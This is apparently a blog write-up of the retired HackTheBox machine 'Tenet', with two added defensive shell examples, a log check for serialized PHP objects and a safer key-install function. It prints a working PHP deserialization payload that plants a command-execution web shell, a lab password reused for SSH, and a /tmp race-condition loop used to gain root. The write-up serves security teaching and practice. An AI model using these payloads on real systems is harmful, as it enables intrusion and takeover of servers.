Hackthebox - Tenet

Summary

Tenet was a medium-difficulty Linux box by HackTheBox user egotisticalSW.
Initial enumeration of the box reveals a sator file and a backup file, which show us a deserialization attack vector that we can use to write a file and get a reverse shell.
After getting onto the box we find the DB password; trying it for the user, we get a shell as user neil. Checking sudo -l, we see we can run enableSSH.sh without a password.
Checking the script, we see we can grab the root SSH key, as the script copies it to a tmp file (race condition) and then deletes it.

Initial Enumeration

nmap

# Nmap 7.91 scan initiated Mon Apr 19 17:02:49 2021 as: nmap -sC -sV -oN nmap/tenet 10.10.10.223
Nmap scan report for 10.10.10.223
Host is up (0.096s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
| 256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
|_ 256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Apr 19 17:03:02 2021 -- 1 IP address (1 host up) scanned in 12.67 seconds

Let's start with port 80.

Web

Opening the page, we see a default Apache page.

Checking the page with the vhost set to tenet.htb, we get what looks like a WordPress site, so I ran wpscan to see if we get any information.

Checking the page, we see a post titled Migration:

We’re moving our data over from a flat file structure to something a bit more substantial. Please bear with us whilst we get one of our devs on the migration, which shouldnt take too long.

Thank you for your patience

We also see a comment from neil:

did you remove the sator php file and the backup?? the migration program is incomplete! why would you do this?!

Let's run gobuster to find sator.php:

gobuster dir --wordlist ./word --url http://tenet.htb -x php
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://tenet.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: ./word
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2021/04/19 17:23:30 Starting gobuster in directory enumeration mode
===============================================================

===============================================================
2021/04/19 17:23:31 Finished
===============================================================

We don't find anything, but based on the post I thought sator might be on a different subdomain, so I added that and checked:

gobuster dir  -w word -u sator.tenet.htb -x bak,backup,swp
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://sator.tenet.htb
[+] Method: GET
[+] Threads: 10
[+] Wordlist: word
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Extensions: bak,backup,swp
[+] Timeout: 10s
===============================================================
2021/04/19 17:47:41 Starting gobuster in directory enumeration mode
===============================================================
/sator.php (Status: 200) [Size: 63]
/sator.php.bak (Status: 200) [Size: 514]

===============================================================
2021/04/19 17:47:42 Finished
===============================================================

Downloading sator.php.bak, we see that sator.php takes a GET parameter, arepo:

<?php

class DatabaseExport
{
    public $user_file = 'users.txt';
    public $data = '';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this-> data = 'Success';
    }


    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
        echo '[] Database updated <br>';
        // echo 'Gotta get this working properly...';
    }
}

$input = $_GET['arepo'] ?? '';
$databaseupdate = unserialize($input);

$app = new DatabaseExport;
$app -> update_db();


?>

So I created a serialized object to

<?php
class DatabaseExport
{
    public $user_file = 'f3v3r.php';
    public $data = '<?php if(isset($_REQUEST[\'cmd\'])){ echo "<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>';

    public function update_db()
    {
        echo '[+] Grabbing users from text file <br>';
        $this-> data = 'Success';
    }


    public function __destruct()
    {
        file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
        // echo 'Gotta get this working properly...';
    }
}
// Serialize the object and URL-encode it for the arepo GET parameter
$PAYLOAD = urlencode(serialize(new DatabaseExport()));
system("curl http://sator.tenet.htb/sator.php?arepo=" . $PAYLOAD);
?>

which placed

$ curl http://sator.tenet.htb/f3v3r.php?cmd=whoami
<pre>www-data</pre>

Which gets us a shell as www-data.
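
An added example, not part of the original write-up: a small log check that flags requests like the one above, where the URL carries a PHP serialized object (O:<len>:"Class":<n>:{). The log lines are constructed samples in Apache combined format, and the function names are hypothetical.

```shell
#!/bin/sh
# Constructed sample lines (Apache combined log format); not taken from the box.
sample_log() {
cat <<'EOF'
10.10.14.5 - - [19/Apr/2021:17:50:01 +0000] "GET /sator.php?arepo=O%3A14%3A%22DatabaseExport%22%3A2%3A%7Bs%3A9%3A%22user_file%22%3Bs%3A8%3A%22note.txt%22%3Bs%3A4%3A%22data%22%3Bs%3A2%3A%22hi%22%3B%7D HTTP/1.1" 200 97 "-" "curl/7.74.0"
10.10.14.9 - - [19/Apr/2021:17:51:12 +0000] "GET /sator.php?arepo=hello HTTP/1.1" 200 63 "-" "Mozilla/5.0"
10.10.14.9 - - [19/Apr/2021:17:52:40 +0000] "GET /sator.php?arepo=a%3A1%3A%7Bi%3A0%3BO%3A8%3A%22stdClass%22%3A0%3A%7B%7D%7D HTTP/1.1" 200 63 "-" "Mozilla/5.0"
10.10.14.7 - - [19/Apr/2021:17:53:02 +0000] "GET /index.php?s=O:Reilly HTTP/1.1" 200 512 "-" "Mozilla/5.0"
EOF
}

# Read access-log lines on stdin and print "client path class" for every
# request whose URL carries a PHP serialized object: O:<len>:"Class":<n>:{
# or the C: form used by classes implementing Serializable.
flag_serialized_objects() {
  awk '{
    ip = $1; url = $7
    # Decode only the characters that delimit a serialized object.
    gsub(/%3[Aa]/, ":", url); gsub(/%22/, "\"", url)
    gsub(/%7[Bb]/, "{", url); gsub(/%3[Bb]/, ";", url)
    if (match(url, /[OC]:[0-9]+:"[^"]+":[0-9]+:[{]/)) {
      hit = substr(url, RSTART, RLENGTH)
      split(hit, part, "\"")           # part[2] is the class name
      path = url; sub(/[?].*/, "", path)
      print ip, path, part[2]
    }
  }'
}

sample_log | flag_serialized_objects
```

A hit on a class name that the application itself defines, as with DatabaseExport here, is the case to look at first, since its magic methods run on the server.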

Checking WordPress's wp-config.php, we see the DB creds.

User (neil)

$ sshpass -p Opera2112 ssh neil@tenet.htb
neil@tenet:~$

Checking sudo -l, we see we can run /usr/local/bin/enableSSH.sh without a password.

Checking the script, we see it creates a temp file and copies the key to /root/.ssh/authorized_keys.

That looks like a race condition to me, so I ran the script below, which keeps overwriting /tmp/ssh*:

while true;do echo "ssh-rsa public key" | tee /tmp/ssh* >/dev/null; done;

and ran

sudo /usr/local/bin/enableSSH.sh

ssh -i root root@tenet.htb

which gets us root.
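
For whoever maintains a script like enableSSH.sh, an added example (not the box's script, which is not shown here) of installing a key without staging it in world-writable /tmp: the temp file is created with mode 0600 next to authorized_keys and renamed into place. The function name, key and paths are constructed.

```shell
#!/bin/sh
# install_key KEY AUTH_FILE
# Adds one public key to AUTH_FILE. The staging file is created with mode 0600
# inside AUTH_FILE's own directory (for root that is /root/.ssh, normally
# closed to other users), so no other account can rewrite it before it is
# installed. A script that stages the key in /tmp and reads it back later has
# no such guarantee.
install_key() {
  key=$1
  auth=$2
  # One line only: a newline would smuggle in a second authorized_keys entry.
  case $key in *'
'*) return 2 ;; esac
  # Must start with a key type, so option prefixes such as command= are refused.
  printf '%s\n' "$key" |
    grep -Eqx '(ssh-rsa|ssh-ed25519) [A-Za-z0-9+/]+=*( [^[:cntrl:]]*)?' || return 2
  (
    umask 077
    tmp=$(mktemp "$(dirname "$auth")/.authkeys.XXXXXX") || exit 1
    trap 'rm -f "$tmp"' EXIT
    if [ -f "$auth" ]; then cat "$auth" > "$tmp"; fi
    # Append only if the exact line is not already present.
    grep -Fqx -- "$key" "$tmp" || printf '%s\n' "$key" >> "$tmp"
    # rename() within one directory is atomic: readers see old or new, never half.
    mv -f "$tmp" "$auth"
  )
}

# Demo with a constructed key and a scratch directory standing in for /root/.ssh.
demo_dir=$(mktemp -d)
install_key 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIConstructedExampleKeyOnly ops@example' \
  "$demo_dir/authorized_keys" && cat "$demo_dir/authorized_keys"
rm -rf "$demo_dir"
```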

Author: Shubham Kumar
Link: https://f3v3r.in/htb/machines/retired/tenet/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.